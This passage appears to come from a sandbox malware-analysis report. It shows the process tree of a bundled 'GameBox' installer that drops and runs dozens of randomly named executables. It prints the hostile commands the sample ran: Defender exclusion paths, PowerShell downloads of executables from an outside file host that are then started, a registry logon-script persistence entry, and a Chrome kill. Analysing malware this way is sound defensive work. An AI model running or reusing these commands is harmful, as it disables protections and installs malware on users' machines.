                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                10⤵
                                                                  PID:2348
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                9⤵
                                                                • Checks computer location settings
                                                                PID:9712
                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                9⤵
                                                                • Loads dropped DLL
                                                                PID:7348
                                                              • C:\Users\Admin\AppData\Local\Temp\is-KM8O6.tmp\{app}\vdi_compiler.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-KM8O6.tmp\{app}\vdi_compiler"
                                                                9⤵
                                                                  PID:4684
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-KM8O6.tmp\{app}\vdi_compiler.exe"
                                                                    10⤵
                                                                      PID:9980
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping localhost -n 4
                                                                        11⤵
                                                                        • Runs ping.exe
                                                                        PID:5264
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:2840
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289459 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                              6⤵
                                                                PID:8012
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              5⤵
                                                                PID:5148
                                                                • C:\Users\Admin\AppData\Local\Temp\is-UB1ED.tmp\VPN.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UB1ED.tmp\VPN.tmp" /SL5="$20318,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5540
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-UNBF2.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-UNBF2.tmp\Setup.exe" /silent /subid=720
                                                                    7⤵
                                                                      PID:6248
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-IT4DG.tmp\Setup.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-IT4DG.tmp\Setup.tmp" /SL5="$1053C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-UNBF2.tmp\Setup.exe" /silent /subid=720
                                                                        8⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        • Modifies system certificate store
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:6984
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                          9⤵
                                                                            PID:5472
                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                              tapinstall.exe remove tap0901
                                                                              10⤵
                                                                              • Checks SCSI registry key(s)
                                                                              PID:7848
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                            9⤵
                                                                              PID:6824
                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                10⤵
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Windows directory
                                                                                • Checks SCSI registry key(s)
                                                                                PID:7056
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                              9⤵
                                                                              • Drops file in Drivers directory
                                                                              • Drops file in System32 directory
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Drops file in Windows directory
                                                                              • Checks SCSI registry key(s)
                                                                              PID:9424
                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                              9⤵
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:9432
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks whether UAC is enabled
                                                                      • Drops file in Program Files directory
                                                                      PID:5224
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:5284
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                        6⤵
                                                                          PID:7788
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im chrome.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:7500
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:5648
                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpD1D3_tmp.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\tmpD1D3_tmp.exe"
                                                                          6⤵
                                                                            PID:32
                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                              "C:\Windows\System32\dllhost.exe"
                                                                              7⤵
                                                                                PID:1796
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                7⤵
                                                                                  PID:6560
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd
                                                                                    8⤵
                                                                                      PID:4852
                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                        9⤵
                                                                                          PID:7624
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                          Esplorarne.exe.com i
                                                                                          9⤵
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:5476
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                            10⤵
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:4752
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                              11⤵
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:6036
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                12⤵
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:6276
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                  13⤵
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:7668
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                    14⤵
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:7664
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                      15⤵
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:3932
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        16⤵
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:8684
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          17⤵
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:8244
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                            18⤵
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:9088
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              19⤵
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:8020
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                20⤵
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:9172
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  21⤵
                                                                                                                  • Drops startup file
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:7532
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping GFBFPSXA -n 30
                                                                                          9⤵
                                                                                          • Runs ping.exe
                                                                                          PID:6432
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks computer location settings
                                                                                  PID:5716
                                                                                  • C:\Users\Admin\Documents\g4ZjxTh0IdDIWPSJwCNdrKiM.exe
                                                                                    "C:\Users\Admin\Documents\g4ZjxTh0IdDIWPSJwCNdrKiM.exe"
                                                                                    6⤵
                                                                                      PID:6364
                                                                                    • C:\Users\Admin\Documents\VdQObgdWB5Q7Ae85Xns685_X.exe
                                                                                      "C:\Users\Admin\Documents\VdQObgdWB5Q7Ae85Xns685_X.exe"
                                                                                      6⤵
                                                                                        PID:6356
                                                                                      • C:\Users\Admin\Documents\9DPjPvK1XIQ_KK8K0ujXxDQu.exe
                                                                                        "C:\Users\Admin\Documents\9DPjPvK1XIQ_KK8K0ujXxDQu.exe"
                                                                                        6⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:6444
                                                                                      • C:\Users\Admin\Documents\ZSY1hVhg8EMr2tclsi1ClDIB.exe
                                                                                        "C:\Users\Admin\Documents\ZSY1hVhg8EMr2tclsi1ClDIB.exe"
                                                                                        6⤵
                                                                                          PID:6504
                                                                                        • C:\Users\Admin\Documents\Tvcsl9MgP4lQobaW6ue5tZE5.exe
                                                                                          "C:\Users\Admin\Documents\Tvcsl9MgP4lQobaW6ue5tZE5.exe"
                                                                                          6⤵
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:6564
                                                                                        • C:\Users\Admin\Documents\nOw58C3T_4FZWotu4ZpNlCoV.exe
                                                                                          "C:\Users\Admin\Documents\nOw58C3T_4FZWotu4ZpNlCoV.exe"
                                                                                          6⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6660
                                                                                          • C:\Users\Admin\Documents\nOw58C3T_4FZWotu4ZpNlCoV.exe
                                                                                            C:\Users\Admin\Documents\nOw58C3T_4FZWotu4ZpNlCoV.exe
                                                                                            7⤵
                                                                                              PID:6972
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 24
                                                                                                8⤵
                                                                                                • Program crash
                                                                                                PID:6772
                                                                                          • C:\Users\Admin\Documents\vSPl8fHFrforkC_AycPEsNN8.exe
                                                                                            "C:\Users\Admin\Documents\vSPl8fHFrforkC_AycPEsNN8.exe"
                                                                                            6⤵
                                                                                              PID:6648
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                7⤵
                                                                                                  PID:5132
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                    8⤵
                                                                                                      PID:4160
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                      8⤵
                                                                                                        PID:9936
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                        8⤵
                                                                                                          PID:8236
                                                                                                    • C:\Users\Admin\Documents\3sVCu2nga0kCcUWytBA7iO4G.exe
                                                                                                      "C:\Users\Admin\Documents\3sVCu2nga0kCcUWytBA7iO4G.exe"
                                                                                                      6⤵
                                                                                                        PID:6516
                                                                                                      • C:\Users\Admin\Documents\gahoKYUfVaiJWvbER66OPzD8.exe
                                                                                                        "C:\Users\Admin\Documents\gahoKYUfVaiJWvbER66OPzD8.exe"
                                                                                                        6⤵
                                                                                                          PID:6424
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 660
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6180
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 676
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:5268
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 640
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Program crash
                                                                                                            PID:4980
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 660
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7672
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 1160
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6656
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 1120
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7276
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 1152
                                                                                                            7⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Executes dropped EXE
                                                                                                            • Program crash
                                                                                                            PID:4708
                                                                                                        • C:\Users\Admin\Documents\u380ooCiQMpfXLzi7h54_neU.exe
                                                                                                          "C:\Users\Admin\Documents\u380ooCiQMpfXLzi7h54_neU.exe"
                                                                                                          6⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:6348
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 760
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6380
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 792
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7304
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 780
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7696
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 824
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4540
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 956
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7156
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 992
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6996
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 964
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7160
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 1376
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7616
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 1492
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7884
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 1452
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:6276
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 1476
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7912
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 1688
                                                                                                            7⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Program crash
                                                                                                            PID:7536
                                                                                                        • C:\Users\Admin\Documents\a3zsOrvUP9sIvb1IZsGgAlfs.exe
                                                                                                          "C:\Users\Admin\Documents\a3zsOrvUP9sIvb1IZsGgAlfs.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3348
                                                                                                          • C:\Users\Admin\Documents\a3zsOrvUP9sIvb1IZsGgAlfs.exe
                                                                                                            C:\Users\Admin\Documents\a3zsOrvUP9sIvb1IZsGgAlfs.exe
                                                                                                            7⤵
                                                                                                              PID:6924
                                                                                                          • C:\Users\Admin\Documents\QrOtERH0Sm1es1Km9s_yS4jD.exe
                                                                                                            "C:\Users\Admin\Documents\QrOtERH0Sm1es1Km9s_yS4jD.exe"
                                                                                                            6⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:4264
                                                                                                          • C:\Users\Admin\Documents\LlD9m5QAJAtWX3WE10s9vAoS.exe
                                                                                                            "C:\Users\Admin\Documents\LlD9m5QAJAtWX3WE10s9vAoS.exe"
                                                                                                            6⤵
                                                                                                              PID:6460
                                                                                                              • C:\Users\Admin\Documents\LlD9m5QAJAtWX3WE10s9vAoS.exe
                                                                                                                C:\Users\Admin\Documents\LlD9m5QAJAtWX3WE10s9vAoS.exe
                                                                                                                7⤵
                                                                                                                  PID:4376
                                                                                                              • C:\Users\Admin\Documents\PITvIDrdiEro1m3Wb3IKpskY.exe
                                                                                                                "C:\Users\Admin\Documents\PITvIDrdiEro1m3Wb3IKpskY.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:1308
                                                                                                              • C:\Users\Admin\Documents\wKefQBTjWpyuZHQhdJPkoyVs.exe
                                                                                                                "C:\Users\Admin\Documents\wKefQBTjWpyuZHQhdJPkoyVs.exe"
                                                                                                                6⤵
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5960
                                                                                                              • C:\Users\Admin\Documents\ik2W4N3ELC2j3LljyJsS8U1s.exe
                                                                                                                "C:\Users\Admin\Documents\ik2W4N3ELC2j3LljyJsS8U1s.exe"
                                                                                                                6⤵
                                                                                                                  PID:6848
                                                                                                                • C:\Users\Admin\Documents\fcZu4wSpLM55U6l3hZ5Jh6kE.exe
                                                                                                                  "C:\Users\Admin\Documents\fcZu4wSpLM55U6l3hZ5Jh6kE.exe"
                                                                                                                  6⤵
                                                                                                                    PID:6596
                                                                                                                    • C:\Users\Admin\AppData\Roaming\1214036.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\1214036.exe"
                                                                                                                      7⤵
                                                                                                                        PID:7336
                                                                                                                      • C:\Users\Admin\AppData\Roaming\6344222.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\6344222.exe"
                                                                                                                        7⤵
                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                        PID:7392
                                                                                                                      • C:\Users\Admin\AppData\Roaming\3194851.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\3194851.exe"
                                                                                                                        7⤵
                                                                                                                          PID:6980
                                                                                                                      • C:\Users\Admin\Documents\R6FPZ_jJ2fN6SJxR436crxiZ.exe
                                                                                                                        "C:\Users\Admin\Documents\R6FPZ_jJ2fN6SJxR436crxiZ.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:4100
                                                                                                                      • C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                        "C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe"
                                                                                                                        6⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:7036
                                                                                                                        • C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                          C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                          7⤵
                                                                                                                            PID:5608
                                                                                                                          • C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                            C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                            7⤵
                                                                                                                              PID:2268
                                                                                                                            • C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                              C:\Users\Admin\Documents\igMBTLu5kuU9TA3vjpqmw1Z4.exe
                                                                                                                              7⤵
                                                                                                                                PID:5304
                                                                                                                            • C:\Users\Admin\Documents\BF_ZMi2rKmfe1tKS5wpXou8d.exe
                                                                                                                              "C:\Users\Admin\Documents\BF_ZMi2rKmfe1tKS5wpXou8d.exe"
                                                                                                                              6⤵
                                                                                                                                PID:6932
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-EAERC.tmp\BF_ZMi2rKmfe1tKS5wpXou8d.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-EAERC.tmp\BF_ZMi2rKmfe1tKS5wpXou8d.tmp" /SL5="$3055E,138429,56832,C:\Users\Admin\Documents\BF_ZMi2rKmfe1tKS5wpXou8d.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:4348
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-9RI2I.tmp\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-9RI2I.tmp\Setup.exe" /Verysilent
                                                                                                                                    8⤵
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    PID:7960
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                      9⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Modifies system certificate store
                                                                                                                                      PID:5156
                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289459 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                        10⤵
                                                                                                                                          PID:2124
                                                                                                                                • C:\Users\Admin\Documents\5CcM5gOX3rZtYxrqmXH8RjDF.exe
                                                                                                                                  "C:\Users\Admin\Documents\5CcM5gOX3rZtYxrqmXH8RjDF.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5500
                                                                                                                                  • C:\Users\Admin\Documents\5CcM5gOX3rZtYxrqmXH8RjDF.exe
                                                                                                                                    "C:\Users\Admin\Documents\5CcM5gOX3rZtYxrqmXH8RjDF.exe" -q
                                                                                                                                    7⤵
                                                                                                                                      PID:3380
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        8⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:6460
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:5500
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                      6⤵
                                                                                                                                        PID:4708
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:5436
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7846092.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7846092.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3756
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3693732.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3693732.exe"
